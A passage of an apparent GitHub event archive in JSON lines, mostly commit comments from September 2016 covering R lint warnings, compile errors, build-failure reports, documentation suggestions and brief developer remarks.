^\n```\n[R/ESF_function.R:13:9:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L13) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda = calcKDA(abund)  #confirmed in PARI\n        ^~~~~~~\n```\n[R/ESF_function.R:13:9:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L13) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda = calcKDA(abund)  #confirmed in PARI\n        ^~~~~~~\n```\n[R/ESF_function.R:15:10:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L15) *style:* **Use <-, not =, for assignment.**\n```r\n​  sumkda = calc_sum_kda(S, J, I, theta, kda)  \n         ^\n```\n[R/ESF_function.R:15:12:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L15) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  sumkda = calc_sum_kda(S, J, I, theta, kda)  \n           ^~~~~~~~~~~~\n```\n[R/ESF_function.R:15:45:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L15) *style:* **Trailing whitespace is superfluous.**\n```r\n​  sumkda = calc_sum_kda(S, J, I, theta, kda)  \n                                            ^~\n```\n[R/ESF_function.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L16) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/ESF_function.R:19:6:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in 1:length(x)) freq_x[i] <- x[[i]]\n     ^\n```\n[R/ESF_function.R:20:14:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L20) *style:* **Use <-, not =, for assignment.**\n```r\n​  prefactor1 = -( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n             ^\n```\n[R/ESF_function.R:20:17:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  prefactor1 = -( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                ^\n```\n[R/ESF_function.R:20:17:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L20) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  prefactor1 = -( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                ^\n```\n[R/ESF_function.R:20:60:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L20) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  prefactor1 = -( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                                                           ^\n```\n[R/ESF_function.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L21) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ESF_function.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L22) *style:* **lines should not be more than 80 characters.**\n```r\n​  factor1 <- lgamma(J+1) + prefactor1  #J!/[prod(n1)prod(Sx!)]  #confirmed in PARI\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ESF_function.R:22:22:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​  factor1 <- lgamma(J+1) + prefactor1  #J!/[prod(n1)prod(Sx!)]  #confirmed in PARI\n                    ~^~\n```\n[R/ESF_function.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ESF_function.R:24:11:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L24) *style:* **Use <-, not =, for assignment.**\n```r\n​  factor2 = S*log(theta)   -  (lgamma(I + J) - lgamma(I))\n          ^\n```\n[R/ESF_function.R:24:14:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/ESF_function.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​  factor2 = S*log(theta)   -  (lgamma(I + J) - lgamma(I))\n            ~^~\n```\n"}},"created_at":"2016-09-22T15:25:46Z"}
{"id":"4603190840","type":"CommitCommentEvent","actor":{"login":"groxxda"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19132018,"position":5,"line":15,"path":"nixos/modules/virtualisation/containers.nix","commit_id":"b9df84cd4f6b70bdfa395a91dbf3d712adc7e18d","created_at":"2016-09-22T15:26:07Z","updated_at":"2016-09-22T15:26:07Z","body":"```\r\nnix-repl> lib.optionalString null \"abc\"\r\nerror: value is null while a Boolean was expected\r\n```"}},"created_at":"2016-09-22T15:26:07Z"}
{"id":"4603194082","type":"CommitCommentEvent","actor":{"login":"maurofmferrao"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19132040,"position":207,"line":551,"path":"lib/Widget/ForecastIo.php","commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-22T15:26:36Z","updated_at":"2016-09-22T15:26:36Z","body":"I will remove it, thanks :+1: \r\n"}},"created_at":"2016-09-22T15:26:36Z"}
{"id":"4603195101","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19132043,"position":null,"line":null,"path":null,"commit_id":"981c81a09465b52f62daed8e9179d9ef6bca0e67","created_at":"2016-09-22T15:26:45Z","updated_at":"2016-09-22T15:26:45Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1123](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13975&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 7 (7 new), passed: 215, ignored: 3 Build time: 00:08:33\n### Failed tests\n```\norg.genivi.sota.core.DeviceUpdatesResourceSpec.POST queues a package for update to a specific vehicle: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.update requests with blacklisted packages are excluded from queue: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.queue items includes update status: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.returns in flight updates for /queued endpoint: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.updates updated_time field is returned to client: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.PUT to set install order should change the package install order: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.can cancel pending updates: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-22T15:26:45Z"}
{"id":"4603204057","type":"CommitCommentEvent","actor":{"login":"dunst0"},"repo":{"name":"kamailio/kamailio"},"payload":{"comment":{"id":19132060,"position":28,"line":28,"path":"modules/ipops/detailed_ip_type.c","commit_id":"2cf9dbadfc4a294927798a1aaf50601c68711a50","created_at":"2016-09-22T15:28:09Z","updated_at":"2016-09-22T15:28:09Z","body":"```\r\ngmake[1]: Entering directory '/usr/src/kamailio/modules/ipops'\r\nMakefile.defs defs skipped\r\nclang -fPIC -DPIC -g -m64    -DNAME='\"kamailio\"' -DVERSION='\"5.0.0-dev6\"' -DARCH='\"x86_64\"' -DOS='freebsd_' -DOS_QUOTED='\"freebsd\"' -DCOMPILER='\"clang 3.4\"' -D__CPU_x86_64 -D__OS_freebsd -DSER_VER=5000000 -DCFG_DIR='\"/usr/local/etc/kamailio/\"' -DRUN_DIR='\"/var/run/kamailio/\"' -DPKG_MALLOC -DSHM_MEM -DSHM_MMAP -DDNS_IP_HACK -DUSE_MCAST -DUSE_TCP -DDISABLE_NAGLE -DHAVE_RESOLV_RES -DUSE_DNS_CACHE -DUSE_DNS_FAILOVER -DUSE_DST_BLACKLIST -DUSE_NAPTR -DWITH_XAVP -DMEM_JOIN_FREE -DF_MALLOC -DQ_MALLOC -DTLSF_MALLOC -DDBG_SR_MEMORY -DUSE_TLS -DTLS_HOOKS -DUSE_CORE_STATS -DSTATISTICS -DMALLOC_STATS -DWITH_AS_SUPPORT -DUSE_SCTP -DFAST_LOCK -DADAPTIVE_WAIT -DADAPTIVE_WAIT_LOOPS=1024 -DCC_GCC_LIKE_ASM -DHAVE_SOCKADDR_SA_LEN -DHAVE_GETHOSTBYNAME2 -DHAVE_UNION_SEMUN -DHAVE_SCHED_YIELD -DHAVE_MSGHDR_MSG_CONTROL -DHAVE_CONNECT_ECONNRESET_BUG -DHAVE_TIMEGM -DHAVE_NETINET_IN_SYSTM -DUSE_RAW_SOCKS -DHAVE_KQUEUE -DHAVE_SELECT  -DKAMAILIO_MOD_INTERFACE -DMOD_NAME='\"ipops\"' -c detailed_ip_type.c -o detailed_ip_type.o\r\ndetailed_ip_type.c:103:17: error: use of undeclared identifier 'AF_INET6'\r\n  if (inet_pton(AF_INET6, in6_string, in6_addr) != 1)  return 0;\r\n                ^\r\ndetailed_ip_type.c:131:17: error: use of undeclared identifier 'AF_INET'\r\n  if (inet_pton(AF_INET, in4_string, &in4_addr) != 1)  return 0;\r\n                ^\r\n2 errors generated.\r\ngmake[1]: *** [../../Makefile.rules:97: detailed_ip_type.o] Error 1\r\ngmake[1]: Leaving directory '/usr/src/kamailio/modules/ipops'\r\ngmake: *** [Makefile:511: modules] Error 1\r\n```\r\n\r\n`#include <sys/socket.h>` is missing to compile it on FreeBSD maschine.\r\nBecause AF_INET and AF_INET6 are defined in this file."}},"created_at":"2016-09-22T15:28:09Z"}
{"id":"4603214799","type":"CommitCommentEvent","actor":{"login":"mame98"},"repo":{"name":"antoniovazquezblanco/ArchSetup"},"payload":{"comment":{"id":19132089,"position":null,"line":null,"path":null,"commit_id":"28f01d534a31b02919df8683e7f35af5644a66b4","created_at":"2016-09-22T15:29:47Z","updated_at":"2016-09-22T15:29:47Z","body":"looks good and should add some more stability in the future :+1: "}},"created_at":"2016-09-22T15:29:47Z"}
{"id":"4603219457","type":"CommitCommentEvent","actor":{"login":"towergame"},"repo":{"name":"bubbie/bluks-adventure-into-space"},"payload":{"comment":{"id":19132096,"position":98,"line":98,"path":"entities.lua","commit_id":"6c8b0e8f6fb946876fcde4d12157c44edb31cf3e","created_at":"2016-09-22T15:30:28Z","updated_at":"2016-09-22T15:30:28Z","body":"yummy\r\n"}},"created_at":"2016-09-22T15:30:28Z"}
{"id":"4603224299","type":"CommitCommentEvent","actor":{"login":"rob006"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19132110,"position":6,"line":27,"path":"framework/CHANGELOG.md","commit_id":"3ba72da6fa11c7565de7ceb002bdf6ff86c841d4","created_at":"2016-09-22T15:31:12Z","updated_at":"2016-09-22T15:31:12Z","body":"Entries for #11949 and #11950 are duplicated - it should be removed."}},"created_at":"2016-09-22T15:31:12Z"}
{"id":"4603225603","type":"CommitCommentEvent","actor":{"login":"azah"},"repo":{"name":"SunDwarf/OWAPI"},"payload":{"comment":{"id":19132111,"position":null,"line":null,"path":null,"commit_id":"f967d0bfaa3a76dfe4c544c9e0fdd1fc508b7625","created_at":"2016-09-22T15:31:24Z","updated_at":"2016-09-22T15:31:24Z","body":"What did you use to figure these out?"}},"created_at":"2016-09-22T15:31:24Z"}
{"id":"4603228209","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19132120,"position":null,"line":null,"path":null,"commit_id":"b81058c0029c98cba88970d4240f725739a98dd7","created_at":"2016-09-22T15:31:47Z","updated_at":"2016-09-22T15:31:47Z","body":"Totally agree. I will make some tests with OPi Lite and NEO within the next weeks to get an idea where to tweak settings for SY8113B but just to send it directly back to megi. Can you add the 480 MHz back? And decide whether you want to set BPi M2+ back to 816 MHz while you're at it (no opinion on that, our thermal experiments said it would be necessary when people are trying out mainline but OTH I don't care about this board at all)"}},"created_at":"2016-09-22T15:31:47Z"}
{"id":"4603230096","type":"CommitCommentEvent","actor":{"login":"mauritsvanrees"},"repo":{"name":"plone/documentation"},"payload":{"comment":{"id":19132123,"position":392,"line":392,"path":"develop/GET_RID_OF_QI.rst","commit_id":"633cb5214c3ac99eb1d2531f7393d2dbe7185964","created_at":"2016-09-22T15:32:06Z","updated_at":"2016-09-22T15:32:06Z","body":"This was the initial commit, which was a simple copy of the original file. Meanwhile I renamed it, edited it, and removed this part (I created a few issues in CMFPlone based on the comments I had here)."}},"created_at":"2016-09-22T15:32:06Z"}
{"id":"4603231509","type":"CommitCommentEvent","actor":{"login":"ericmj"},"repo":{"name":"hexpm/hex"},"payload":{"comment":{"id":19132130,"position":29,"line":199,"path":"lib/hex/remote_converger.ex","commit_id":"89e560ba21a9fa0bc88a36e83fcff305e9a9edfc","created_at":"2016-09-22T15:32:19Z","updated_at":"2016-09-22T15:32:19Z","body":"Yes, will fix. Thanks for catching it."}},"created_at":"2016-09-22T15:32:19Z"}
{"id":"4603233535","type":"CommitCommentEvent","actor":{"login":"rockdaboot"},"repo":{"name":"rockdaboot/libpsl"},"payload":{"comment":{"id":19132136,"position":null,"line":null,"path":null,"commit_id":"e2812e8c4cff7daba154f851945fd1e217a1ffb6","created_at":"2016-09-22T15:32:38Z","updated_at":"2016-09-22T15:32:38Z","body":"There was a memleak. Still is, have a testcase. Look at it tomorrow."}},"created_at":"2016-09-22T15:32:38Z"}
{"id":"4603233539","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/lodex"},"payload":{"comment":{"id":19132137,"position":null,"line":null,"path":null,"commit_id":"ccc58f8f826475768aeb6a076b6eb3dadce711c3","created_at":"2016-09-22T15:32:38Z","updated_at":"2016-09-22T15:32:38Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;hTq7xc9V&#x2F;32-introduire-la-notion-de-zone-d-affichage-d-une-colonne\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Introduire la notion de zone d&#39;affichage d&#39;une colonne</a>"}},"created_at":"2016-09-22T15:32:38Z"}
{"id":"4603235926","type":"CommitCommentEvent","actor":{"login":"Ameobea"},"repo":{"name":"Ameobea/Calculator-Programs"},"payload":{"comment":{"id":19132143,"position":null,"line":null,"path":null,"commit_id":"c89d288d9405088be3fc37842bdae7a68b408601","created_at":"2016-09-22T15:33:00Z","updated_at":"2016-09-22T15:33:00Z","body":"@dalexj \r\n```\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\nI, Casey Primozic, created and committed this commit: \r\nhttps://github.com/Ameobea/Calculator-Programs/commit/c89d288d9405088be3fc37842bdae7a68b408601#commitcomment-19125588\r\nWith the SHA1 hash c89d288d9405088be3fc37842bdae7a68b408601\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: Keybase OpenPGP v2.0.56\r\nComment: https://keybase.io/crypto\r\n\r\nwsFcBAABCgAGBQJX4/mMAAoJECoCIi2jQluZlp4QAIQYHvO0HMe6bq7qD/jd7+Cv\r\nfwMUbQ4ep/uk+aTHM1IbIhJfCNxcTkLzQeEKhQ7J/opE19rlL8hMc+bVTmEXmDru\r\nCvSrKpYXEDujI8UAa+3EoylGxPJoBXDQEHQ45oN0sw20iEokfwbXYW77Zw4KwZet\r\nNut3NvTaQ25kh/s1AdYtQFOmVcH5tv5jLDYNplPWcsz+cfJEGHAJ5wa+rzP0bpys\r\nTltsNxYClpP4SE0Lrz96J25Bx+5QrNLul+0uPvCiqrchskdn6+FrgX9a8I0/yObe\r\n3W/Mp3pTfVCrquX9Nz8FqgDD2uvY3FnBy4HlBFsK6hAnzs9sEtLs185j7zg2ClTZ\r\n+Wr/hHW+0vm1HrI0HcyGlbSj3rw1D1l1py5UfuhWhABZ63fuC607lO2oIBne18cg\r\n0em8fpYP7S3FIASuA+u8qxFZn0tBiaXNiW5QPllXB1TCLjQP/bMXb93Hc/CmydVE\r\n4zR4lP+ROgsJDHb2y+cMVqvxrKqDg0TM4CzGwmmygBt46bpsJTmp1PwRAqX1IWjE\r\nDDTbQ7qIgJ9urVZWK2TRbkoBYX0jzGoRsf9iPeUZFVxvJTUV/qvgKZ627NufWDeM\r\n9nSIEMlnBC9mwgVGdKsKoeCddtoy7IqAYFBiPj4oJ85V3BL3e/KlybdTKUcGM2tK\r\n1DGEjZ5tWy+HWeKpLZ61\r\n=hKno\r\n-----END PGP SIGNATURE-----\r\n```"}},"created_at":"2016-09-22T15:33:00Z"}
{"id":"4603236275","type":"CommitCommentEvent","actor":{"login":"JasonGross"},"repo":{"name":"mit-plv/fiat-crypto"},"payload":{"comment":{"id":19132144,"position":5,"line":4,"path":"src/Util/LockedLet.v","commit_id":"e9fb194f228321f9477a26bf18617047722fd42a","created_at":"2016-09-22T15:33:02Z","updated_at":"2016-09-22T15:33:02Z","body":"I need to think about the right way to present this.  It might actually be sufficient to use `dlet` in the relevant places.  The two properties I need are that I can prevent `simpl` from inlining it, and that when I explicitly unfold it, I am left with a let-in.  Shall I see if it works using `dlet` and removing this file?"}},"created_at":"2016-09-22T15:33:02Z"}
{"id":"4603238982","type":"CommitCommentEvent","actor":{"login":"TingYiShun"},"repo":{"name":"fogleman/primitive"},"payload":{"comment":{"id":19132147,"position":null,"line":null,"path":null,"commit_id":"b90f6e0eb0ca7cb7bd79de71efecc442583a15eb","created_at":"2016-09-22T15:33:27Z","updated_at":"2016-09-22T15:33:27Z","body":"Some kinds of flexible outfits, you can include certain followers, which decorate in between. In some cases, noticing afterwards will treated accord to their efforts.\r\n\r\n"}},"created_at":"2016-09-22T15:33:27Z"}
{"id":"4603240012","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/lodex"},"payload":{"comment":{"id":19132151,"position":null,"line":null,"path":null,"commit_id":"84e5311db2e37387f873a0347d6a7c978e23a76a","created_at":"2016-09-22T15:33:37Z","updated_at":"2016-09-22T15:33:37Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;bPxKPqh2&#x2F;23-partager-la-configuration-pour-le-fichier-films-csv\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> partager la configuration pour le fichier films.csv</a>"}},"created_at":"2016-09-22T15:33:37Z"}
{"id":"4603240919","type":"CommitCommentEvent","actor":{"login":"maziminke"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19132152,"position":4,"line":68,"path":"application/models/InstallerConfigForm.php","commit_id":"321dca9742667e20b1232fb7b24c63022ee2ebac","created_at":"2016-09-22T15:33:46Z","updated_at":"2016-09-22T15:33:46Z","body":"This commit breaks DB names with dashed like \"DB1234-lime\" which is a pretty common DB naming scheme for several providers. PLease include \"-\" as valid character.\r\nI have re-opened https://bugs.limesurvey.org/view.php?id=11621 (yes, I know it is not exactly the same problem)."}},"created_at":"2016-09-22T15:33:46Z"}
{"id":"4603242343","type":"CommitCommentEvent","actor":{"login":"mherrr79"},"repo":{"name":"mherrr79/sorting"},"payload":{"comment":{"id":19132155,"position":null,"line":null,"path":null,"commit_id":"0a29d463d0cdb8bc0415fd13b10e58df53fc37cd","created_at":"2016-09-22T15:34:00Z","updated_at":"2016-09-22T15:34:00Z","body":"source code for assignment 1"}},"created_at":"2016-09-22T15:34:00Z"}
{"id":"4603242491","type":"CommitCommentEvent","actor":{"login":"dsyme"},"repo":{"name":"sylvanc/core-docs"},"payload":{"comment":{"id":19132156,"position":95,"line":95,"path":"docs/fsharp/using-fsharp-on-azure/blob-storage.md","commit_id":"0ee0269384e7889beebba692e0ecedbf384e35ff","created_at":"2016-09-22T15:34:02Z","updated_at":"2016-09-22T15:34:02Z","body":"Formatting looks a bit awkward here, suggest\r\n\r\n```fsharp\r\n    let permissions = BlobContainerPermissions(PublicAccess = BlobContainerPublicAccessType.Blob)\r\n    container.SetPermissions permissions\r\n```"}},"created_at":"2016-09-22T15:34:02Z"}
{"id":"4603248356","type":"CommitCommentEvent","actor":{"login":"dsyme"},"repo":{"name":"sylvanc/core-docs"},"payload":{"comment":{"id":19132178,"position":112,"line":112,"path":"docs/fsharp/using-fsharp-on-azure/blob-storage.md","commit_id":"0ee0269384e7889beebba692e0ecedbf384e35ff","created_at":"2016-09-22T15:34:55Z","updated_at":"2016-09-22T15:34:55Z","body":"TO use this, ``path\\myfile`` must exist. I suppose add something to first create that directory and file. Also I think we should use ``path/myfile`` as that will work on Linux.\r\n\r\n"}},"created_at":"2016-09-22T15:34:55Z"}
{"id":"4603248501","type":"CommitCommentEvent","actor":{"login":"AleksCore"},"repo":{"name":"JarnoVgr/Mr.Green-MTA-Resources"},"payload":{"comment":{"id":19132182,"position":null,"line":null,"path":null,"commit_id":"4094f4c1e5d78f9abf1ff2f03379492c80c780e6","created_at":"2016-09-22T15:34:56Z","updated_at":"2016-09-22T15:34:56Z","body":"#203 "}},"created_at":"2016-09-22T15:34:56Z"}
{"id":"4603249989","type":"CommitCommentEvent","actor":{"login":"martin-g"},"repo":{"name":"wicketstuff/core"},"payload":{"comment":{"id":19132186,"position":50,"line":92,"path":"portlet-parent/wicketstuff-portlet/src/main/java/org/apache/wicket/portlet/PortletUrlRenderer.java","commit_id":"dfcd0bcf5747c82e969ff02a1a6555637c22fbd4","created_at":"2016-09-22T15:35:10Z","updated_at":"2016-09-22T15:35:10Z","body":"I prefer using wicket-utils' Strings.replaceAll() for such things. String#replace(CharSequence, CharSequence) uses non-compiled regex and is slower."}},"created_at":"2016-09-22T15:35:10Z"}
{"id":"4603250310","type":"CommitCommentEvent","actor":{"login":"davidpotratz"},"repo":{"name":"mybb/mybb2"},"payload":{"comment":{"id":19132187,"position":21,"line":21,"path":"app/Http/Controllers/Auth/AuthController.php","commit_id":"05ebb14acbd67a7b8eb3b2eff9138b6252684bf2","created_at":"2016-09-22T15:35:13Z","updated_at":"2016-09-22T15:35:13Z","body":"David James Potratz"}},"created_at":"2016-09-22T15:35:13Z"}
{"id":"4603255670","type":"CommitCommentEvent","actor":{"login":"flackr"},"repo":{"name":"majido/animation-worklet-proposal"},"payload":{"comment":{"id":19132203,"position":null,"line":null,"path":null,"commit_id":"8d9999f9408a3f262497312650cd7963dce1d73f","created_at":"2016-09-22T15:36:01Z","updated_at":"2016-09-22T15:36:01Z","body":"This makes sense in general, but since CompositorWorker has a bug with reading the scroll position of the root scroller (https://crbug.com/645493) I've updated my demo to have the overflow scroller and background be siblings and not have a root. See https://github.com/flackr/houdini-samples/commit/fcfe14f69f6d71f40e8949be42156ec7d665ccdd"}},"created_at":"2016-09-22T15:36:01Z"}
{"id":"4603256326","type":"CommitCommentEvent","actor":{"login":"gabebw"},"repo":{"name":"jayroh/dotfiles.new"},"payload":{"comment":{"id":19132206,"position":7,"line":16,"path":"tag-zsh/config/zsh/aliases.zsh","commit_id":"f5fd81d071be3d82fda158d6ca149a2bc565c0e2","created_at":"2016-09-22T15:36:08Z","updated_at":"2016-09-22T15:36:08Z","body":"You can also do `ls ~/.dotfiles/tag-* | sed ...`, if you like."}},"created_at":"2016-09-22T15:36:08Z"}
{"id":"4603261238","type":"CommitCommentEvent","actor":{"login":"haasn"},"repo":{"name":"mpv-player/mpv"},"payload":{"comment":{"id":19132224,"position":null,"line":null,"path":null,"commit_id":"c296b6204fcace8a3ad99c08fa5d2931b70e57cc","created_at":"2016-09-22T15:36:53Z","updated_at":"2016-09-22T15:36:53Z","body":"I'm pretty sure the chroma offset is wrong, see the `FIXME` in the code. I gave up while trying to devise an algorithm to correctly rotate the chroma offset, but I'm sure it can be done."}},"created_at":"2016-09-22T15:36:53Z"}
{"id":"4603262051","type":"CommitCommentEvent","actor":{"login":"SunDwarf"},"repo":{"name":"SunDwarf/OWAPI"},"payload":{"comment":{"id":19132230,"position":null,"line":null,"path":null,"commit_id":"cafb5e872dc0756c8b2f4d2c3551a74ac40df48f","created_at":"2016-09-22T15:37:00Z","updated_at":"2016-09-22T15:37:00Z","body":"heck off merge commit"}},"created_at":"2016-09-22T15:37:00Z"}
{"id":"4603264177","type":"CommitCommentEvent","actor":{"login":"jayroh"},"repo":{"name":"jayroh/dotfiles.new"},"payload":{"comment":{"id":19132232,"position":7,"line":16,"path":"tag-zsh/config/zsh/aliases.zsh","commit_id":"f5fd81d071be3d82fda158d6ca149a2bc565c0e2","created_at":"2016-09-22T15:37:20Z","updated_at":"2016-09-22T15:37:20Z","body":"Why the hell did I not think of that earlier\r\n\r\nThank you Gabe :)"}},"created_at":"2016-09-22T15:37:20Z"}
{"id":"4603265174","type":"CommitCommentEvent","actor":{"login":"atici"},"repo":{"name":"ibab/cyres"},"payload":{"comment":{"id":19132237,"position":null,"line":null,"path":null,"commit_id":"0c4d4417b9a5b263a5fa77c8d3ef1b75bd2576ff","created_at":"2016-09-22T15:37:30Z","updated_at":"2016-09-22T15:37:30Z","body":"I successfully installed cyres but I can't run this example as it is. FirstOrderFunction is not defined nor GradientProblemSolver(), ... even though I ran \"from cyres import *\" ok. What are the steps in getting this up and running? Thank you. "}},"created_at":"2016-09-22T15:37:30Z"}
{"id":"4603265329","type":"CommitCommentEvent","actor":{"login":"dsyme"},"repo":{"name":"sylvanc/core-docs"},"payload":{"comment":{"id":19132238,"position":112,"line":112,"path":"docs/fsharp/using-fsharp-on-azure/blob-storage.md","commit_id":"0ee0269384e7889beebba692e0ecedbf384e35ff","created_at":"2016-09-22T15:37:31Z","updated_at":"2016-09-22T15:37:31Z","body":"e.g.\r\n\r\n```\r\n    let _ = \r\n        Directory.CreateDirectory(__SOURCE_DIRECTORY__ + \"/path\") |> ignore\r\n        File.WriteAllText(__SOURCE_DIRECTORY__ + \"/path/myfile\", \"some data\")\r\n        use fileStream = System.IO.File.OpenRead(__SOURCE_DIRECTORY__ + \"/path/myfile\")\r\n        blockBlob.UploadFromStream(fileStream)\r\n```"}},"created_at":"2016-09-22T15:37:31Z"}
{"id":"4603268120","type":"CommitCommentEvent","actor":{"login":"alitokmen"},"repo":{"name":"codehaus-cargo/cargo"},"payload":{"comment":{"id":19132241,"position":null,"line":null,"path":null,"commit_id":"2c37b11a05ff83b8530e17efe854af6956175589","created_at":"2016-09-22T15:37:58Z","updated_at":"2016-09-22T15:37:58Z","body":"There will always be a next time 👍 "}},"created_at":"2016-09-22T15:37:58Z"}
{"id":"4603272595","type":"CommitCommentEvent","actor":{"login":"SunDwarf"},"repo":{"name":"SunDwarf/OWAPI"},"payload":{"comment":{"id":19132251,"position":null,"line":null,"path":null,"commit_id":"6687d8fdc0296b9aa71bfec846c54de07674865c","created_at":"2016-09-22T15:38:38Z","updated_at":"2016-09-22T15:38:38Z","body":"I hope nobody noticed >.>"}},"created_at":"2016-09-22T15:38:38Z"}
{"id":"4603274976","type":"CommitCommentEvent","actor":{"login":"dsyme"},"repo":{"name":"sylvanc/core-docs"},"payload":{"comment":{"id":19132257,"position":112,"line":112,"path":"docs/fsharp/using-fsharp-on-azure/blob-storage.md","commit_id":"0ee0269384e7889beebba692e0ecedbf384e35ff","created_at":"2016-09-22T15:39:01Z","updated_at":"2016-09-22T15:39:01Z","body":"Actually I'll prepare a PR with a set of changes for these fixes"}},"created_at":"2016-09-22T15:39:01Z"}
{"id":"4603278161","type":"CommitCommentEvent","actor":{"login":"BoyanStamatev"},"repo":{"name":"BoyanStamatev/Repository-1"},"payload":{"comment":{"id":19132264,"position":5,"line":5,"path":"BlueScreen.txt","commit_id":"8e7f03b95c6fb3ad871df1f4ff796a4921ade320","created_at":"2016-09-22T15:39:31Z","updated_at":"2016-09-22T15:39:31Z","body":"Comment 1"}},"created_at":"2016-09-22T15:39:31Z"}
{"id":"4603278947","type":"CommitCommentEvent","actor":{"login":"amedina14"},"repo":{"name":"amedina14/hello-world"},"payload":{"comment":{"id":19132267,"position":null,"line":null,"path":null,"commit_id":"cd0f8bc921d89099a86b9e7998c6cf812aacf1ef","created_at":"2016-09-22T15:39:38Z","updated_at":"2016-09-22T15:39:38Z","body":"consciente..\r\n\r\n"}},"created_at":"2016-09-22T15:39:38Z"}
{"id":"4603283071","type":"CommitCommentEvent","actor":{"login":"flackr"},"repo":{"name":"majido/animation-worklet-proposal"},"payload":{"comment":{"id":19132285,"position":5,"line":141,"path":"README.md","commit_id":"8d9999f9408a3f262497312650cd7963dce1d73f","created_at":"2016-09-22T15:40:19Z","updated_at":"2016-09-22T15:40:19Z","body":"Will the root always be the scrollable element or do we need something equivalent to document.scrollingElement?"}},"created_at":"2016-09-22T15:40:19Z"}
